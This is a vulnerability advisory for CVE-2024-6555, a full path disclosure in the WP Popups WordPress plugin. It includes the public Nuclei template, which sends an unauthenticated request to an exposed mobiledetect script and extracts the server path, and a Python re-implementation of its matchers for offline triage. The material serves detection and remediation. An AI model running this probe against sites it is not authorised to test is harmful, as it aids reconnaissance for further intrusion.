CVE-2024-6555: WP Popups - Information Disclosure

Date: 2025-12-02 | Affected software: WP Popups | PoC: public

Vulnerability description

The WP Popups - WordPress Popup builder plugin for WordPress contains a full path disclosure: a bundled mobiledetect script is reachable without any access restriction, so an unauthenticated attacker can retrieve the server's absolute file system path. Exploitation requires no special conditions.

PoC code [public]

id: CVE-2024-6555

info:
  name: WP Popups - Information Disclosure
  author: theamanrawat
  severity: medium
  description: |
    WP Popups - WordPress Popup builder plugin for WordPress contains a full path disclosure caused by using mobiledetect without access restrictions, letting unauthenticated attackers retrieve server paths, exploit requires no specific conditions.
  impact: |
    Attackers can obtain server file paths, aiding in further exploitation of the website.
  remediation: |
    Update to version 2.2.0.2 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-popups-lite/wp-popups-wordpress-popup-builder-2201-unauthenticated-full-path-disclosure
    - https://nvd.nist.gov/vuln/detail/CVE-2024-6555
    - https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3115849%40wp-popups-lite&new=3115849%40wp-popups-lite&sfp_email=&sfph_mail=
    - https://www.wordfence.com/threat-intel/vulnerabilities/id/578892f2-9841-4493-8445-61b79feb4764?source=cve
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2024-6555
    epss-score: 0.09
    epss-percentile: 0.9232
  metadata:
    verified: true
    max-requests: 1
    public-www: "/wp-content/plugins/wp-popups-lite/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,wp-popups-lite,fpd

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wp-popups-lite/src/vendor/mobiledetect/mobiledetectlib/export/exportToJSON.php'

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - '/[a-zA-Z0-9_\-/]+/wp-content/plugins/wp-popups-lite/src/vendor/mobiledetect/mobiledetectlib/Mobile_Detect\.json'

      - type: word
        part: content_type
        words:
          - 'text/html'

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - "Done. Check (/.+?/wp-content/plugins/wp-popups-lite/src/vendor/mobiledetect/mobiledetectlib/Mobile_Detect.json) file."
# digest: 4a0a0047304502210080b49afbf76156a564e9caf99ea4a8be9788c09edd53fe45b36d2e46307bb16d02207ac0fbd29be5aaab1c7b326d230e55ed16a559392d04a741ed60abcbcf564c57:922c64590222798bb761d5b6d8e72950
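The following is an added example, not part of the original page or the Nuclei project, that transcribes the template's three matchers (regex on body, word on content type, status 200, combined with `matchers-condition: and`) and its group-1 extractor into plain Python. It is useful for triaging captured responses offline, for instance to confirm after updating to 2.2.0.2 that the endpoint no longer echoes a path. The response samples, including the absolute path `/var/www/html`, are constructed for the example.

```python
import re

# Matchers and extractor transcribed from the Nuclei template above.
PATH_RE = re.compile(
    r"/[a-zA-Z0-9_\-/]+/wp-content/plugins/wp-popups-lite/src/vendor/"
    r"mobiledetect/mobiledetectlib/Mobile_Detect\.json"
)
EXTRACT_RE = re.compile(
    r"Done\. Check (/.+?/wp-content/plugins/wp-popups-lite/src/vendor/"
    r"mobiledetect/mobiledetectlib/Mobile_Detect\.json) file\."
)


def evaluate(status: int, content_type: str, body: str):
    """Apply the template's matchers with matchers-condition: and.

    Returns (matched, disclosed_path). disclosed_path is the extractor's
    group 1, or None when the matchers did not all fire.
    """
    matched = (
        status == 200                       # type: status
        and "text/html" in content_type     # type: word, part: content_type
        and PATH_RE.search(body) is not None  # type: regex, part: body
    )
    if not matched:
        return False, None
    m = EXTRACT_RE.search(body)
    return True, (m.group(1) if m else None)


# Constructed sample responses (not real captures); the path is made up.
VULNERABLE = (
    200, "text/html; charset=UTF-8",
    "Done. Check /var/www/html/wp-content/plugins/wp-popups-lite/src/vendor/"
    "mobiledetect/mobiledetectlib/Mobile_Detect.json file.",
)
# What a patched or access-restricted install should return instead.
BLOCKED = (403, "text/html", "<html><body>Forbidden</body></html>")
JSON_ONLY = (200, "application/json", '{"status":"ok"}')

if __name__ == "__main__":
    for label, resp in (("vulnerable", VULNERABLE), ("blocked", BLOCKED),
                        ("json", JSON_ONLY)):
        print(label, evaluate(*resp))
```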
